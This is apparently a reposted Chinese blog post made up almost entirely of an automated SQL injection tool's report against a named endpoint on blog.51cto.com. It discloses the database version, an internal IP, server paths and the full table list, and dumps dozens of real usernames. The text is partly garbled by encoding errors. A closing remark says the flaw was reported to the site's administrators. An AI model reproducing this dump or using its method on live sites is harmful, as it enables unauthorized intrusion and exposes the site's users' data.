Parameter Name Parameter Value
Scan URL https://blog.51cto.com/mod/userface.php?useruid=103622
2
Database Type Mysql
Injection Type Integer
Keyword True
Charset 0
2 of 15
Database Server Information
Information title Information Value
magic_quotes_gpc On
OS 1 Linux
OS 2 unknown-linux-gnu
VERSION 5.4.1-beta-log
DATABASE pblog
USER mysql@192.168.168.224
SYSTEM_USER mysql@192.168.168.224
SESSION_USER mysql@192.168.168.224
CURRENT_USER mysql@192.168.168.%
BASE DIR /usr/server/mysql54/
DATA DIR /usr/server/mysql54/var/
TEMP DIR /tmp/
group_concat_max_len 1024
Stacked No
3 of 15
Table List
Table Name Page
pw4_diyclass 7
pw_match_users 7
record_user_category 7
pw4_groupblock 7
pw_photo 7
sorcecount 7
act_twoyear 7
pw2_vote 7
pw_blog_adv 7
book_user 7
pw4_addgroup 7
pw_favour 7
guanggao_user 7
pw_tuser 7
pw_setting 7
java_edu3 7
pw_userlink 7
pw_stoneTogold_betting 7
pw2_flink 7
record_user_category_week 7
pw4_diyclassart 8
pw_bgmusic 8
pw4_grouplogin 8
pw_plusfile 8
pw_comment_bak 8
pw4_user_group 8
asus_active 8
weekview 8
collect_blog 8
pw4_adminaction 8
pw2_blogtag_bak 8
hope_activerecord 8
pw_uid_bid 8
pw_match_reported 8
pw_userskin 8
pw_stoneTogold_homeprize 8
pw_passport 8
sorce 8
pw2_visit 8
4 of 15
Table Name Page
pw_blog 9
pw4_grouptag 9
pw3_photo 9
pw_domain 9
pw4_view 12
pw_search_word 12
java_edu 12
em_list_update 12
pw_special_tag 12
pw2_bmsg_bak 12
hope_prizerecord 12
pw5_bbsart 12
index2_jd 12
stopuser 12
pw_share 12
index_star 13
pw4_flink 13
blog_active_prizeman 13
pw_upload 13
index_imgs 13
pw_userblock 13
pw_bmsg 13
groupgooder 13
pw_style 13
pw_gbook 13
tempscore 13
pw5_style 13
live_user 13
record_user_category_user_day 13
pw4_mod_setting 13
pw2_relatedart 13
pw_group 13
index_jd 13
pw_match_vote 13
pw_class 14
groupindex_imgs 14
pw_pusher_blogs 14
threeyear_toupiao 14
pw3_album 14
niming_comment 14
record_user_category_user_month 14
pw4_bbsart 14
pw2_style 14
5 of 15
Table Name Page
pw_huodongbm 14
pw_user 14
pw4_group_art 14
pw_messager 14
pw_class_update 14
pw_stoneTogold_stone 14
pw_recommen 14
pw5_bbsart_content 14
blog_star 14
pw3_album_comment 14
pw2_blog_bak 15
pw4_join 15
pw4_bbsart_content 15
pw2_update 15
index_gz 15
pw_user_weekbak 15
pw_special_adv 15
group_message 15
pw_stoneTogold_userinfo 15
pw_replace 15
tempart 15
pw5_group 15
bocai 15
record_user_category_month 15
pw4_lives 15
pw4_bbsarttj 15
6 of 15
pw4_diyclass
pw_match_users
record_user_category
pw4_groupblock
pw_photo
sorcecount
act_twoyear
pw2_vote
pw_blog_adv
book_user
pw4_addgroup
pw_favour
guanggao_user
pw_tuser
pw_setting
java_edu3
pw_userlink
pw_stoneTogold_betting
pw2_flink
7 of 15
record_user_category_week
pw4_diyclassart
pw_bgmusic
pw4_grouplogin
pw_plusfile
pw_comment_bak
pw4_user_group
asus_active
weekview
collect_blog
pw4_adminaction
pw2_blogtag_bak
hope_activerecord
pw_uid_bid
pw_match_reported
pw_userskin
pw_stoneTogold_homeprize
pw_passport
sorce
8 of 15
pw2_visit
pw_blog
pw4_grouptag
pw3_photo
pw_domain
username blogname
hbl1983 10100
鐓鐓鐓鐓10099
yyp1103 10098
jmwang 10097
temp2005 10096
AnnexMicro annexmicro
qiaoyanan qiaoyanan
gyltR 10093
lvye 10092
qianrw 10091
aiqing aiqing
lby37 10089
鐓鐓鐓鐓鐓鐓鐓10088
sunyuchun sunyuchun
liweiguo lwg
鐓鐓€鐓鐓10085
black.dot blackdot
dobob 10083
鐓鐓鐓10082
steven-luo 10081
simon simon
鐓鐓鐓10079
zhuzj zhijun
6465132161 10077
鐓鐓鐓鐓鐓鐓1 10076
wuying_gf 10075
424252542 10074
78424242 10073
7824524 10072
鐓鐓鐓1 10071
鐓鐓鐓1111 10070
鐓鐓鐓鐓10069
richyuzi 10068
langhanbing 10067
9 of 15
username blogname
chinacaser 10066
鐓鐓鐓IT 10065
sexyjava 10064
antiger8 10063
鐓鐓鐓鐓10062
sysname 10061
zfwinner 10060
billypeng 10059
鐓€鐓鐓鐓鐓10058
鐓€鐓鐓鐓鐓10057
鐓鐓鐓鐓鐓鐓10056
qing 10055
doing 10054
kfjane 10053
ljfks auyn
sunliony 10051
idata 10050
NullNet nnet
z_lu_er 10048
hookeen_lee 10047
kaiser88 10046
jiajiashu 10045
鐓鐓鐓鐓鐓鐓鐓鐓鐓鐓panda
cguo 10043
funny 10042
鐓€鐓鐓鐓levelive
wubei wubei
鐓鐓鐓鐓鐓鐓10039
findo metaverse
toy0011314 10037
鐓鐓鐓鐓鐓鐓10036
woaishenghuo 10035
qiejingde 10034
鐓鐓鐓鐓鐓鐓blueghost
gerryxue 10032
鐓鐓鐓1 100
鐓鐓鐓鐓?85 lyl185
dengyfad 10169
menle 10168
zyj888 10167
longcaudafox 10166
mythology 10165
yb9655 10164
topyk 10163
denglinming 10162
10 of 15
username blogname
f102f88 10161
iamtiger 10160
renchy 10159
wangwei123 10158
weste.net 10157
鐓鐓鐓10156
linting1120 10155
wu_0003 10154
ffchenhui 10153
鐓鐓鐓鐓鐓鐓violet
yaonc 10151
zhouzhangjian 10150
mickey 10149
god828 10148
wbjlcq 10147
xbingaiu 10146
LC5211314 10145
hugeant 10144
lqh031 10143
careerjava 10142
lipzbob 10141
maomao 10140
zhyp 10139
postwj 10138
dqddsj 10137
hhq669 10136
luodejin 10135
zkyq 10134
hzhou 10133
20101 10132
coolsong 10131
ww831118 10130
blackfox_666 10129
zlzzvip 10128
banyi 10127
vivosttt 10126
atow 10125
stone 10124
serve 10123
sky009 10122
icesea 10121
zythsj 10120
www6343 10119
yyc371 10118
鐓鐓鐓鐓鐓鐓10117
11 of 15
username blogname
jayking 10116
鐓鐓鐓鐓tianrui
landline 10114
jakee 10113
鐓鐓鐓鐓鐓鐓10112
liuhengfeng 10111
fulm2008 10110
zqz05 10109
mfkytn 10108
dg110224 10107
jiazf82 10106
鐓鐓鐓鐓10105
tyykawey 10104
qkyh 10103
achuan achuan
fish_happy Enskong
hbl1983 10100
鐓鐓鐓鐓10099
yyp
pw4_view
pw_search_word
java_edu
em_list_update
pw_special_tag
pw2_bmsg_bak
hope_prizerecord
pw5_bbsart
index2_jd
stopuser
pw_share
12 of 15
index_star
pw4_flink
blog_active_prizeman
pw_upload
index_imgs
pw_userblock
pw_bmsg
groupgooder
pw_style
pw_gbook
tempscore
pw5_style
live_user
record_user_category_user_day
pw4_mod_setting
pw2_relatedart
pw_group
index_jd
pw_match_vote
13 of 15
pw_class
groupindex_imgs
pw_pusher_blogs
threeyear_toupiao
pw3_album
niming_comment
record_user_category_user_month
pw4_bbsart
pw2_style
pw_huodongbm
pw_user
pw4_group_art
pw_messager
pw_class_update
pw_stoneTogold_stone
pw_recommen
pw5_bbsart_content
blog_star
pw3_album_comment
14 of 15
pw2_blog_bak
pw4_join
pw4_bbsart_content
pw2_update
index_gz
pw_user_weekbak
pw_special_adv
group_message
pw_stoneTogold_userinfo
pw_replace
tempart
pw5_group
bocai
record_user_category_month
pw4_lives
pw4_bbsarttj
出于对51cto的尊敬、自己技术有限,没有再深入测试
测试结果已通知管理人员,滥用此漏洞者,后果自负
关注51cto,关注
seclufei
转载于:https://blog.51cto.com/seclufei/541484
12万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
